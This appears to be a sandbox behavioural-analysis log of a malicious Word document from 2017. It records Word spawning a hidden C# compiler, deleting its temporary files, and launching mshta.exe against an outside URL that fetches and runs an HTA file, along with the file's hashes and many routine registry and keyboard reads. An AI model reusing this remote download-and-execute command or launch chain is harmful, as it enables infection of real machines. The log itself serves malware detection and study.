| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out, type = file_type |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out, size = 379 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Process | Create | process_name = "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline", os_pid = 0xba0, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.pdb |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\Desktop\__Sn.cs |
|
1 |
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe |
| Command Line | "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:36 |
| Information | Value |
|---|---|
| PID | 0xba0 |
| Parent PID | 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BA4
0x
0
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| COM | Create | interface = 31BCFCE2-DAFB-11D2-9F81-00C04F79A0A3, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| COM | Create | interface = B81FF171-20F3-11D2-8DCC-00A0C9B00521, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\microsoft.net\framework64\v2.0.50727\cvtres.exe |
| Command Line | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESEDB9.tmp" "c:\Users\aETAdzjz\Desktop\CSCED98.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:02, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:34 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xbb8 |
| Parent PID | 0xba0 (c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BBC
|
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\mshta.exe |
| Command Line | "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:02, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:34 |
| Information | Value |
|---|---|
| PID | 0xbc0 |
| Parent PID | 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BC4
0x
BD8
0x
BE0
0x
BE4
0x
BE8
0x
BFC
0x
784
0x
82C
0x
84C
0x
878
0x
308
0x
6B4
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\t[2].hta | 3.24 KB (3313 bytes) |
MD5:
13b131d98fea2526196b20496ec68b0a
SHA1: 1284d7400f30f5a2c409f3f53fcf34b30c32268d SHA256: ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2017-10-24 17:37:59 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 127203 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0xff9d0000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x776fc4a0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, data = C:\Windows\System32\mshtml.dll, type = REG_SZ |
|
1 | |
| Module | Load | module_name = C:\Windows\System32\mshtml.dll, base_address = 0x7fee0880000 |
|
1 | |
| System | Get Time | type = System Time, time = 2017-10-24 17:37:59 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 127546 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | |
| Module | Get Filename | module_name = C:\Windows\System32\mshtml.dll, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshtml.dll, size = 260 |
|
1 | |
| File | Open Mapping | filename = #MSHTML#PERF#00000BC0, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\advapi32.dll, base_address = 0x7feff8e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventWrite, address_out = 0x7782b510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventRegister, address_out = 0x7783cac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EventUnregister, address_out = 0x77823c80 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0xff9d0000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\mshta.exe, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = RegisterApplicationRestart, address_out = 0x7775f510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\mshtml.dll, function = RunHTMLApplication, address_out = 0x7fee0ad5b90 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x7fefc060000 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
2 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeSRWLock, address_out = 0x778384f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x77828020 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockShared, address_out = 0x778254e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x77828050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockShared, address_out = 0x778254b0 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x7fefde70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 6, address_out = 0x7fefde71320 |
|
1 | |
| System | Get Info | - |
|
2 | |
| Module | Get Handle | module_name = EXPLORER.EXE, base_address = 0x0 |
|
1 | |
| Module | Get Handle | module_name = IEXPLORE.EXE, base_address = 0x0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup, value_name = Print_Background |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 7, address_out = 0x7fefde71020 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 8, address_out = 0x7fefde713f0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | |
| COM | Create | interface = 08C0E040-62D1-11D1-9326-0060B067B86E, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Window | Create | wndproc_parameter = 3921792 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Module | Load | module_name = OLEACC.DLL, base_address = 0x7fef22f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleacc.dll, function = LresultFromObject, address_out = 0x7fef22f3aa8 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
